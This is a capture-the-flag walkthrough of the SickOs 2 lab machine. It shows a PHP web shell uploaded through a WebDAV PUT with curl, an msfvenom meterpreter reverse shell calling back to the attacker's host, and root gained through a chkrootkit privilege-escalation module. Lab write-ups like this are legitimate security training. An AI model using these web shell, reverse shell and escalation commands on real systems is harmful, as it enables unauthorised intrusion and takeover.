Description:-
This is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system.
Since it a OSCP like box we are taking it down today….. lol.
We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/Sickos 2]
└─$ nmap -sC -sV -oA nmap 172.16.139.177
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 12:06 EDT
Nmap scan report for 172.16.139.177
Host is up (0.00052s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.10 seconds
We have 2 open ports SSH and HTTP let hit port 80 first which is the HTTP port .
We found a simpe web page so i try checking the source code first maybe a hint is left behind but nothing just a troll lol .
Let hit directory burster which is our mighty gobuster lol .
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/Sickos 2]
└─$ gobuster dir -u http://172.16.139.177/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.139.177/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php,html
[+] Timeout: 10s
===============================================================
2021/05/16 12:12:45 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 163]
/test (Status: 301) [Size: 0] [--> http://172.16.139.177/test/]
/%7Echeckout%7E (Status: 403) [Size: 345]
===============================================================
2021/05/16 12:16:03 Finished
===============================================================
Cool let check http://172.16.139.177/test but nothing really in the dir i really spend sometime here .
So i decide to check for HTTP-METHOD with nmap since i got nothing really interesting in gobuster also i try running nikto but seriously nothing .
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/Sickos 2]
└─$ nikto -h http://172.16.139.177/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.139.177
+ Target Hostname: 172.16.139.177
+ Target Port: 80
+ Start Time: 2021-05-16 12:25:54 (GMT-4)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.28
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ 26545 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2021-05-16 12:26:32 (GMT-4) (38 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Now back to nmap scanning for HTTP-Method .
nmap --script http-methods <target>
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/Sickos 2]
└─$ nmap --script http-methods 172.16.139.177
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 12:27 EDT
Nmap scan report for 172.16.139.177
Host is up (0.00038s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Nmap done: 1 IP address (1 host up) scanned in 19.09 seconds
Cool so i decide to scan the directory i found also with the nmap script .
nmap --script http-methods --script-args http-methods.url-path='/website' <target>
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/Sickos 2]
└─$ nmap --script http-methods --script-args http-methods.url-path='/test' 172.16.139.177
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 12:31 EDT
Nmap scan report for 172.16.139.177
Host is up (0.00063s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-methods:
| Supported Methods: PROPFIND DELETE MKCOL PUT MOVE COPY PROPPATCH LOCK UNLOCK GET HEAD POST OPTIONS
| Potentially risky methods: PROPFIND DELETE MKCOL PUT MOVE COPY PROPPATCH LOCK UNLOCK
|_ Path tested: /test
Nmap done: 1 IP address (1 host up) scanned in 18.26 seconds
Ahhhhh cool now it getting interesting as we can see, the method PUT is allowed on the URL meaning we can create a new file on the webserver like upload a webshell to get a reverse shell back to us let try that now.
curl -v -X OPTIONS http://172.16.139.177/test
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/Sickos 2]
└─$ curl -v -X OPTIONS http://172.16.139.177/test
* Trying 172.16.139.177:80...
* Connected to 172.16.139.177 (172.16.139.177) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 172.16.139.177
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://172.16.139.177/test/
< Content-Length: 0
< Date: Sun, 16 May 2021 19:39:56 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 172.16.139.177 left intact
Now let upload a PHP code to get a command execution from the webserver yea running a system command you got it right .
curl -v -X PUT -d '<?php system ($_GET['cmd']) ?>' http://172.16.139.177/test/cmd.php
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/Sickos 2]
└─$ curl -v -X PUT -d '<?php system ($_GET['cmd']) ?>' http://172.16.139.177/test/cmd.php
* Trying 172.16.139.177:80...
* Connected to 172.16.139.177 (172.16.139.177) port 80 (#0)
> PUT /test/cmd.php HTTP/1.1
> Host: 172.16.139.177
> User-Agent: curl/7.74.0
> Accept: */*
> Content-Length: 28
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 28 out of 28 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Content-Length: 0
< Date: Sun, 16 May 2021 19:44:12 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 172.16.139.177 left intact
Now let check http://172.16.139.177/test/ we can see we have sucessfully uploaded it cool right?? now let try to execute command .
http://172.16.139.177/test/cmd.php?cmd=id and boom it working .
Now let try to get a shell back to us using msfvenom now .
msfvenom -p php/meterpreter_reverse_tcp lhost=172.20.10.4 lport=443 -f raw > shell.php
why do i use port 443 because most of the port on the machine is blocked and i think the only ports that give back reverse shell is port 443 and port 8080 now let upload the shell we just generated.
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/Sickos 2]
└─$ curl -T shell.php http://172.16.139.177/test/shell.php
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>417 - Expectation Failed</title>
</head>
<body>
<h1>417 - Expectation Failed</h1>
</body>
</html>
Strange but i got failed so i try doing some research on it with no time i found the fix ahhh cool right .
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/Sickos 2]
└─$ curl -T shell.php http://172.16.139.177/test/shell.php --http1.0
Now let check http://172.16.139.177/test/ back to confirm if it uploaded .
And boom it uploaded now let start msfconsole and set it up to catch our shell .
- use exploit/multi/handler
- set payload php/meterpreter_reverse_tcp
- set lhost Local-IP
- set lport 443
Now let click on exploit and back to the http://172.16.139.177/test/ to click on the shell.php we just uploaded .
NOTE:- you need to run msfconsole with sudo or if you are in root you are good to go to run exploit.
Now let click the shell.php we uploaded .
And boom we have shell smooth right?? lol .
Privilege Escalation
Now let drop in a shell by typing shell and spawning a TTY shell with python -c 'import pty; pty.spawn ("/bin/bash")' and we are good to go cool .
So we only have one 2 users on the box root and john going through john home folder i found nothing also checking the tmp and opt folder everything seems empty.
So i decided to check the crontab and guess what i found something interesting in the /etc/cron.daily .
The chkrootkit so i check the version and check for some available exploit.
Also found one for metasploit which is nice and easy for us to use now .
Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privilege escalation. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default.
Now let background our shell to use the Chkrootkit Local Privilege Escalation module .
It should be like the image below .
Now let run exploit and wait for it probably it will take some time .
Boom we are root sweet now let get our flag in the root directory.
Box rooted cool right?? .
Greeting From Muzec